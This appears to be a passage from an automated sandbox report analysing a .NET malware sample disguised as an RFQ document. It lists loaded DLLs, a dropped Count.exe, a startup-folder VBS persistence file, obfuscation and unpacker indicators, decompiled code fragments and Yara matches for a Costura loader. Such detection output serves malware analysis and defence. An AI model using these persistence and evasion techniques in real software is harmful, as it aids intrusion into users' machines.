Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.000000000478E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1795094408.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.0000000004617000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.000000000413C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.000000000478E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1795094408.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.0000000004617000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.000000000413C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, YivfexVWZI1iWQ36XG.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	.Net Code: Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777252)),Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777284))})

.NET source code contains potential unpacker

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6a60000.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.478e758.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.473e738.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.Count.exe.3ca7428.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6980000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.3fb61c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.3e81da0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1794630967.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2038135450.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787752415.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Count.exe PID: 8136, type: MEMORYSTR

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02AC6C89 push ebp; ret	0_2_02AC6C90
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02AC2CE8 pushfd ; ret	0_2_02AC2CE9
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C32500 pushfd ; iretd	0_2_05C32501
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C367DF pushad ; ret	0_2_05C367E6
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C367E7 pushad ; ret	0_2_05C36806
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C310D5 push ss; ret	0_2_05C310D9
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C35D07 push esp; ret	0_2_05C35D12
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C35CFF push esp; ret	0_2_05C35D06
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C35C93 push edi; ret	0_2_05C35C9E
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C38CA3 push BA01039Fh; retf 0001h	0_2_05C38CA8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C38F60 push BA01039Fh; retf	0_2_05C38F65
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C39E40 pushfd ; ret	0_2_05C39E42
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05C3BE3E push edi; retf	0_2_05C3BE4E
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06817468 pushfd ; retf 0103h	0_2_06817475
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F3D90 push es; ret	0_2_068F3E40
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06900AB6 push BA01039Fh; retn 0002h	0_2_06900ABB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06902BAB push es; ret	0_2_06902BAC
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_0690C899 push ebx; iretd	0_2_0690C89A
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06901425 push BA01039Fh; retn 0002h	0_2_0690143D
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_069011B3 push BA01039Fh; retn 0002h	0_2_069011BD
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06906DA3 push es; ret	0_2_06906DA4
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A5CC0F push es; retf	0_2_06A5CC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F435D8 pushad ; retf	1_2_00F435D9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00B66C89 push ebp; ret	4_2_00B66C90
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00B62CE8 pushfd ; ret	4_2_00B62CE9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05512500 pushfd ; iretd	4_2_05512501
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05517640 push BA00819Fh; retf	4_2_05517645
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0551C6CA push es; ret	4_2_0551C6D1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05517383 push BA00819Fh; retf 0001h	4_2_05517388
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0551D202 push cs; iretd	4_2_0551D211
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06123C10 push eax; ret	4_2_06124139

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, sOkSXXFJauWqYlU8epA.cs	High entropy of concatenated method names: 'GHNFklihaU', 'YDDF55uUAb', 'p7TFQaFsHV', 'KYhFGBkadx', 'okAFAA2ZB4', 'yVrFCPigcR', 'K4HFlOyp75', 'gjcFWj9JLH', 'p0yFN6iO7Y', 'DSlFsj0du9'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, YivfexVWZI1iWQ36XG.cs	High entropy of concatenated method names: 'zy674Hvodp5WgKo0wUw', 'wXvbAmvFe4QHOuBt5dU', 'n2LozW0HDq', 'vh0ry9Sq2v', 'qZXFgXBBGU', 'u5ZF9RQ3ef', 'XHOFjxA6O9', 'iwAFuk1BfX', 'iYoIIVUmOA', 'gIKHsmJtv'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	High entropy of concatenated method names: 'MrHlkkePfFkMuI69WAV', 'inT42qecubhyQxIxv6P', 'KLFHjvdgqF', 'vh0ry9Sq2v', 'P3gHw7W2LC', 'hoBHveppek', 'vw0HgfQcXQ', 'hZLHilPCp7', 'AVmGFJKnFE', 'e7gFDZRtIV'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, Qe5XSqHq7hMHqjVS1vL.cs	High entropy of concatenated method names: 'HI6BueF41X', 'EhIBLYkJLO', 'lqLBXbMSIP', 'dLcB4KXZh1', 'GxmBR1DIhE', 'iyyBnxhFQU', 'bKuBP1ncfD', 'khnBclpQuj', 'y9sBQI8kRb', 'cRLBFxEjrK'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, fxNqEWB2LfJo2gKnZg0.cs	High entropy of concatenated method names: 'vdYxLSnK6W', 'rO4xX9XM2A', 'ubTx4ba3B9', 'cnbxRneRSD', 's5mxntSj76', 'jsDxPyxThw', 'cs6xcKH0j5', 'Hm0BN8O0Dx', 'SpIxQkxBA7', 'V8hxFnNEK8'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack, IINOltnMJm5Uo3kpLAr.cs	High entropy of concatenated method names: 'tW1nK8MUGV', 'ztJnS1TEDZ', 'VSZnE1n5PJ', 'UuXnlx6CIi', 'uI6nh4CXvs', 'AGBnJCvnFB', 'sggn6phpxR', 'D9KnYVUvlD', 'REcnsBIdd3', 'D9pnwG0H45'

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Count.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
